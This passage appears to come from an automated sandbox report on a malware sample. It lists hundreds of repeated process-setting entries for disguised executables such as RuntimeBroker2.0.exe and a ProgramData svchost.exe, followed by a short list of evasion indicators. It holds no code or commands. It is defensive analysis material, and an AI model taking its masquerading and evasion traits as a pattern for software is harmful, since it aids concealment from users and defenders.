                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeMemory allocated: 1AD0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeMemory allocated: 1B9D0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeMemory allocated: 2227B980000 memory reserve | memory write watchJump to behavior
